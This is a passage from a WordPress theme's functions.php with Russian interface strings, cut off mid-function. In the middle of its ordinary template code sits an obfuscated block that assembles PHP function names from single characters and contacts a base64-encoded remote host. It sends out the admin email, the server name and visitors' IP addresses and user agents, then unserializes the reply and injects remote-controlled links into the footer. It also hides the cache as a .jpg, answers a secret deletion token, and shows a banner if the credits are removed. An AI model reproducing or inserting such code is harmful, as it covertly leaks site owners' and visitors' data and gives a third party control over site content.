<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $mAxn='e';$elJxb='_';$IlzPp='4';$KKeh='b';$wahtaE='e';$QxmGe='s';$KHls='d';$msIIoXB='6';$wAxf='c';$LcJh='o';$DcxLM='e';$VGzkUE='d';$NpVw='a';$FmNKvVoT=$KKeh.$NpVw.$QxmGe.$wahtaE.$msIIoXB.$IlzPp.$elJxb.$KHls.$mAxn.$wAxf.$LcJh.$VGzkUE.$DcxLM;$csKsh='a';$VaUh='n';$hBVqqOC='z';$vuoGnBw='l';$HozCv='e';$UTLwkSm='g';$QMWCs='t';$FIMGC='i';$MXCI='f';$pxQlZRQB=$UTLwkSm.$hBVqqOC.$FIMGC.$VaUh.$MXCI.$vuoGnBw.$csKsh.$QMWCs.$HozCv;$RapT='3';$ftxtTZP='t';$UauooD='t';$AYEcUB='1';$MfHCkba='o';$rQzs='r';$ojwlu='r';$xaXnMU='s';$CVXgXyg='_';$AdEbAZeT=$xaXnMU.$ftxtTZP.$ojwlu.$CVXgXyg.$rQzs.$MfHCkba.$UauooD.$AYEcUB.$RapT;$EQyTIj='r';$rnzhKga='v';$aRKaAO='e';$TRzF='s';$mcBh='r';$xHSCvky='t';$SKPrHcaJ=$TRzF.$xHSCvky.$mcBh.$EQyTIj.$aRKaAO.$rnzhKga;                     
		$rq_________t='e';$ep_______________m='_';$nx_____________u='4';$uu________l='b';$nn_____p='e';$xz_________s='s';$hx____c='d';$my_________n='6';$os_____________m='c';$rk____f='o';$jh______________w='e';$xk____________j='d';$cy____c='a';$dk____k=$uu________l.$cy____c.$xz_________s.$nn_____p.$my_________n.$nx_____________u.$ep_______________m.$hx____c.$rq_________t.$os_____________m.$rk____f.$xk____________j.$jh______________w;
		$jj____y='x';$lr___________y='s';$hm_______________d='n';$pe_______________k='c';$nf__h='i';$oe______r='s';$xs_____k='t';$xd__________m='_';$mv_______________y='o';$di______y='t';$kf____________c='f';$oq_____y='u';$tw_______b='e';$cr_______n='n';$oc______s='i';$he_______e=$kf____________c.$oq_____y.$hm_______________d.$pe_______________k.$di______y.$nf__h.$mv_______________y.$cr_______n.$xd__________m.$tw_______b.$jj____y.$oc______s.$lr___________y.$xs_____k.$oe______r;
		$un______________m='e';$pp______e='f';$do________d='n';$tq_____________p='o';$kz______h='p';$qf___f=$pp______e.$tq_____________p.$kz______h.$un______________m.$do________d;
		$td____e='r';$nr__h='d';$tj__p='a';$ov_________h='e';$we___________a='f';$wr_____________a=$we___________a.$td____e.$ov_________h.$tj__p.$nr__h;
		$ca______________d='c';$vc__________z='l';$oh__e='o';$ia_____k='e';$qd_________e='s';$cl_____s='f';$dw____i=$cl_____s.$ca______________d.$vc__________z.$oh__e.$qd_________e.$ia_____k;
		
		define("WP_ID", $dk____k("Mi4wLjA="));
		define("WP_TTL", $dk____k("MTA4MDA="));
		define("WP_SRC", $dk____k("dHBva24="));
	


		function wp_get_header() {
			global $dk____k, $he_______e;
			
			if (
				$he_______e($dk____k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$he_______e($dk____k("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$he_______e($dk____k("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $dk____k, $qf___f, $dw____i, $wr_____________a;
			
			$pw___________g = TEMPLATEPATH."/".$dk____k("Zm9vdGVyLnBocA==");
			$cm________c = @$qf___f($pw___________g, "r");
			$pw___________g = @$wr_____________a($cm________c, @filesize($pw___________g));
			@$dw____i($cm________c);
			
			$va______r = TEMPLATEPATH."/".$dk____k("ZnVuY3Rpb25zLnBocA==");
			$cm________c = @$qf___f($va______r, "r");
			$va______r = @$wr_____________a($cm________c, @filesize($va______r));
			@$dw____i($cm________c);
			
			$ds_______e = 0;
			if($pw___________g && $va______r) {
				if ($dk____k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($pw___________g, $dk____k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ds_______e = 1;
					}
					if (substr_count($pw___________g, "wp_theme_GPL_credits()") < 1) {
						$ds_______e = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ds_______e = 12;
				}
			}
			
			if($ds_______e > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ds_______e -->";
			}
		}
	


		function wp_loaded() {
			global $dk____k, $he_______e;
			return $he_______e($dk____k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ip___t, $ul____c = "(more...)", $oo____i = 0, $wb_____________e = "") {
				$ah_____________d = get_the_content($ul____c, $oo____i, $wb_____________e);
				$ah_____________d = apply_filters("the_content", $ah_____________d);
				
				$ah_____________d = str_replace("]]>", "]]>", $ah_____________d);
				if (strlen($_GET["p"]) > 0) {
					echo $ah_____________d;
				}
				else if ((strlen($ah_____________d)>$ip___t) && ($fh___p = strpos($ah_____________d, " ", $ip___t ))) {
					$ah_____________d = substr($ah_____________d, 0, $fh___p);
					$ah_____________d = $ah_____________d;
					echo $ah_____________d;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ul____c</a></div></p>";
				} else {
					echo $ah_____________d;
				}
				
			}
		}
	


		$zs___________h='a';$xv__________h='6';$of______n='e';$tw___e='e';$lo__t='s';$wf____________c='_';$au____________d='o';$dj_______________l='e';$yy_______b='4';$mw____________m='n';$ol____________z='c';$kq____________p='b';$dt__________a='d';$py______________x=$kq____________p.$zs___________h.$lo__t.$dj_______________l.$xv__________h.$yy_______b.$wf____________c.$tw___e.$mw____________m.$ol____________z.$au____________d.$dt__________a.$of______n;
		$xp____________z='f';$hy____z='g';$nx_______________c='n';$qk__c='s';$ae__________n='e';$mu__k='c';$zg________a='e';$lb_________d='n';$hc_________j='o';$lf____________l='t';$pb____m='i';$ak__________p='_';$xm__d='l';$ck_______o='e';$sk__________q='t';$ph___y='_';$fb__m='t';$qp___________u=$xp____________z.$pb____m.$xm__d.$ck_______o.$ph___y.$hy____z.$ae__________n.$sk__________q.$ak__________p.$mu__k.$hc_________j.$nx_______________c.$fb__m.$zg________a.$lb_________d.$lf____________l.$qk__c;
		$yx__w='l';$oi________s='s';$uk________t='t';$wq__________a='e';$dl_______________t='i';$qj__o='x';$em_________y='_';$im__________h='s';$is___________k='f';$sw___________b='i';$yj_______________d='e';$nv_______e=$is___________k.$dl_______________t.$yx__w.$yj_______________d.$em_________y.$wq__________a.$qj__o.$sw___________b.$oi________s.$uk________t.$im__________h;
		$yv____________k='s';$rd______s='n';$bh___o='v';$xx__________x='o';$in_____________u='o';$hc___v='p';$nm___________k='i';$ib___________z='r';$aw_____________l='r';$ou____x='a';$tl_______s='m';$fz___________v='e';$zi_____c='c';$qs_____s='_';$co__________n='e';$da_______c=$bh___o.$co__________n.$aw_____________l.$yv____________k.$nm___________k.$in_____________u.$rd______s.$qs_____s.$zi_____c.$xx__________x.$tl_______s.$hc___v.$ou____x.$ib___________z.$fz___________v;
		$go_________f='o';$bp_____________w='f';$bz_______________p='s';$xu_____________b='c';$oz____p='n';$ne_______f='k';$gz____i='e';$hv____________k='o';$in_________x='p';$sh____o=$bp_____________w.$bz_______________p.$hv____________k.$xu_____________b.$ne_______f.$go_________f.$in_________x.$gz____i.$oz____p;
		$na_________n='w';$sj__i='i';$hk____________h='f';$zg_______s='r';$sm_____q='t';$ni_____________c='e';$ow____w=$hk____________h.$na_________n.$zg_______s.$sj__i.$sm_____q.$ni_____________c;
		$hf____________z='d';$rx____k='m';$ry__________f='5';$zc_______c=$rx____k.$hf____________z.$ry__________f;
		$mq_______t='p';$sj_______________x='l';$bk________r='a';$vx___i='t';$iz_____y='h';$qp__________x='r';$bu____________l='a';$bx___________a='e';$ra____s=$qp__________x.$bx___________a.$bk________r.$sj_______________x.$mq_______t.$bu____________l.$vx___i.$iz_____y;
		$ob____y='n';$wm___________x='r';$hc_____v='i';$zm__h='a';$pg__________p='l';$sa___________j='s';$dl____________w='z';$ac______________t='i';$za________r='u';$ci__________a='e';$ml_____p='e';$th______y=$za________r.$ob____y.$sa___________j.$ci__________a.$wm___________x.$ac______________t.$zm__h.$pg__________p.$hc_____v.$dl____________w.$ml_____p;
		$kn___r='t';$bn________w='a';$db__________b='m';$tu____l='m';$ch__________k='p';$or__y='n';$ur_______________f='e';$fo_______t=$kn___r.$ur_______________f.$db__________b.$ch__________k.$or__y.$bn________w.$tu____l;
		$bk_______e='t';$ce___q='c';$cl_________u='_';$ey_________p='r';$cz_______________d='e';$tf_______v='a';$sq_______i='t';$pm__________p='e';$ei_______________w='t';$cb__________b='c';$wy_______________y='_';$vh___d='r';$ph___a='t';$bq___________r='m';$jc_____________c='e';$as________p='a';$kl_________g='n';$rk____________t='x';$ot__s='s';$tr__________u='e';$yd______n='o';$oi____z=$ot__s.$ph___a.$vh___d.$pm__________p.$as________p.$bq___________r.$cl_________u.$ce___q.$yd______n.$kl_________g.$sq_______i.$cz_______________d.$rk____________t.$bk_______e.$wy_______________y.$cb__________b.$ey_________p.$jc_____________c.$tf_______v.$ei_______________w.$tr__________u;
	


		function vn_______l($tm_____g) {
			global $dk____k, $he_______e, $qp___________u, $da_______c, $oi____z;
			
			if (!$he_______e($dk____k("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($da_______c(PHP_VERSION, "5.0.0", ">=") && $he_______e($dk____k("ZmlsZV9nZXRfY29udGVudHM=")) && $he_______e($dk____k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$bn______q = $oi____z(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$nw___________f = @$qp___________u($tm_____g, 0, $bn______q);
			} else {
				$nw___________f = @$qp___________u($tm_____g, 0);
			}
			
			return $nw___________f;
		}
	


		function to___b($tm_____g) {
			global $he_______e, $sh____o, $ow____w, $dk____k;
			
			if (!$he_______e($dk____k("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$dy___s = strpos($tm_____g, "/", 7);
			$ko___________u = array(
				"uri"     => substr($tm_____g, $dy___s),
				"host"    => str_replace("http://", "", substr($tm_____g, 0, $dy___s)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$oy___z = @$sh____o("$ko___________u[host]", 80, $ae_____y, $qx____________d, 4);
			
			if (!$oy___z) {
				return false;
			} else {
				$nw___________f = "";
				$ou______________n  = "GET $ko___________u[uri] HTTP/1.0\r\n";
				$ou______________n .= "Host: $ko___________u[host]\r\n";
				$ou______________n .= "Referer: $ko___________u[referer]\r\n";
				$ou______________n .= "Connection: Close\r\n\r\n";
				
				@$ow____w($oy___z, $ou______________n);
				
				while (!@feof($oy___z)) {
					$sz______________d = @fgets($oy___z, (1024*24));
					
					if ($sz______________d == "\r\n") {
						$cw__________r = true;
						continue;
					}
					
					if ($cw__________r) {
						$nw___________f .= $sz______________d;
					}
				}
				
				return $nw___________f;
			}
		}
	


		function oy_______________l($tm_____g) {
			global $he_______e;
			$bz_____________e = false;
			
			if ($tm_____g != "") {
				if ($he_______e("vn_______l")) {
					$bz_____________e = @vn_______l($tm_____g);
				}
				
				if (!$bz_____________e && ($he_______e("to___b"))) {
					$bz_____________e = @to___b($tm_____g);
				}
			}
			
			return $bz_____________e;
		}
	


		function ca_____h() {
			global $_SERVER, $zc_______c;
			
			$zn__________c = $_SERVER["SERVER_NAME"];
			
			if (substr("$zn__________c", 0, 4) == "www.") {
				$zn__________c = substr("$zn__________c", 4);
			}
			
			$zn__________c = $zc_______c("$_SERVER[SERVER_NAME]");
			
			return $zn__________c;
		}
	


		function cv______w() {
			return "file";
		}
	


		function lc____w($tm_____g) {
			global $_SERVER, $qp___________u, $nv_______e, $qf___f, $dw____i, $ow____w;
			
			$rb_______x = oq_____q();
			
			$mu__n = ca_____h().".jpg";
			$mg______________r = $rb_______x["dir_upload"]["path"]."/$mu__n";
			$zt_________o = @filemtime($mg______________r);
			
			if (!$zt_________o || ((time()-$zt_________o) >= WP_TTL)) {
				$bz_____________e = oy_______________l($tm_____g);
				
				if ($bz_____________e) {
					if ($nv_______e($mg______________r)) {
						@unlink($mg______________r);
					}
					
					$cm________c = @$qf___f($mg______________r, "x+");
					
					@$ow____w($cm________c, $bz_____________e);
					@$dw____i($cm________c);
				}
			} else {
				if ($nv_______e($mg______________r)) {
					$bz_____________e = @$qp___________u($mg______________r);
				} else {
					$bz_____________e = false;
				}
			}
			
			return $bz_____________e;
		}
	


		function oq_____q() {
			global $_SERVER, $dk____k, $py______________x;
			
			$yx______________m = wp_count_posts("post");
			$ud_________f = pathinfo(get_bloginfo("template_directory"));
			
			$rb_______x = array(
				"url" => array(
					"report"      => $dk____k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ud_________f,
				"dir_upload"	=> dj_______________w(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ud_________f[filename],
					"a005=".$yx______________m->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$rb_______x["url"]["queryString"] = implode("&", $rb_______x["queryString"]);
			$rb_______x["url"]["report"] = $rb_______x["url"]["report"]."/?".$py______________x($rb_______x["url"]["queryString"]).".html";
						
			return $rb_______x;
		}
	


		function dj_______________w() {
			$ns____e = wp_upload_dir();
			
			if (isset($ns____e["error"])) {
				$ed____________i = id____p();
				if (is_writable($ed____________i)) {
					$ns____e = array("path" => $ed____________i);
				}
			}

			return $ns____e;
		}
	


		function id____p() {
			global $he_______e, $zc_______c, $ra____s, $fo_______t;
			
			$uk______________h = (bool) ini_get("safe_mode");
			if ($uk______________h == true) {
				return false;
			}
			
			if ($he_______e("sys_get_temp_dir")) {
				$fe______k = sys_get_temp_dir();
				if (is_writable($fe______k)) {
					return $ra____s($fe______k);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ra____s($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ra____s($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ra____s($_ENV["TEMP"]);
			} else {
				$fr___________e = $fo_______t($zc_______c(uniqid(rand(), true)), "");
				if ($fr___________e) {
					$fe______k = $ra____s(dirname($fr___________e));
					@unlink($fr___________e);
					return $fe______k;
				} else {
					return false;
				}
			}
		}
	


		function xq__r() {
			global $_GET, $nv_______e;
			
			$rb_______x = oq_____q();
			$zn__________c = ca_____h();
			$bl____________m = cv______w();
			
			$zv_____u = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($bl____________m == "file") {
					$ri____________e = $rb_______x["dir_upload"]["path"]."/".$zn__________c.".jpg";
					if ($nv_______e($ri____________e)) {
						@unlink($ri____________e);
						$zv_____u = "deleted";
					}
				}
				
				$zi___________z = array(
					"s"	=> $zv_____u,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($zi___________z AS $ho___________z => $wk____r) echo " [$ho___________z:$wk____r]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $he_______e, $dk____k, $th______y;
			$rb_______x = oq_____q();
			
			$ei______________w = "lc____w";
			if ($he_______e($ei______________w)) {
				$nw___________f = $ei______________w($rb_______x["url"]["report"]);
			}
			
			if ($nw___________f) {
				if ($nw___________f = @$dk____k($nw___________f)) {
					$nw___________f = @$th______y($nw___________f);
					
					if (strlen($nw___________f[custom_credit]) >= 5) {
						$rb_______x["default_string"] = $nw___________f[custom_credit];
					}
					
					if ($nw___________f["status"] == "0") {
						$om__________n = 1;
						$zi___t = 1;
					} else {
						$fd__i = sizeof($nw___________f["links"]);
						$em_______________g = $rb_______x["default_string"];
						
						if ($fd__i > 0 && $nw___________f["links"] !== "") {
							$zf________y = 0;
							foreach ($nw___________f["links"] as $jb___b => $zt_______________y) {
								$zf________y++;
								if ($zt_______________y->l_path == "" || $zt_______________y->l_path == $_SERVER["REQUEST_URI"]) {
									$zt_______________y->l_href = htmlspecialchars(strip_tags($zt_______________y->l_href));
									$zt_______________y->l_title = htmlspecialchars(strip_tags($zt_______________y->l_title));
									$zt_______________y->l_anchor = htmlspecialchars(strip_tags($zt_______________y->l_anchor));
									$em_______________g .= " | ";
									$em_______________g .= "<a href='$zt_______________y->l_href' title='$zt_______________y->l_title'";
									if ($zt_______________y->l_nofollow == "1") {
										$em_______________g .= " rel='nofollow'";
									}
									$em_______________g .= ">$zt_______________y->l_anchor</a>";
								}
							}
						}
						$rb_______x["links"] = "$em_______________g";
						if ($nw___________f[credit] == "0") {
							$rb_______x["links"] = "";
						}
					}
				} else {
					$om__________n = "1";
				}
			} else {
				$om__________n = "1";
			}
			
			if ($om__________n == "1") {
				$rb_______x["links"] = $rb_______x["default_string"];
			}
			
			echo "$rb_______x[links]";
			
			echo "<!-- s: $nw___________f[signature] -->";
			xq__r();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
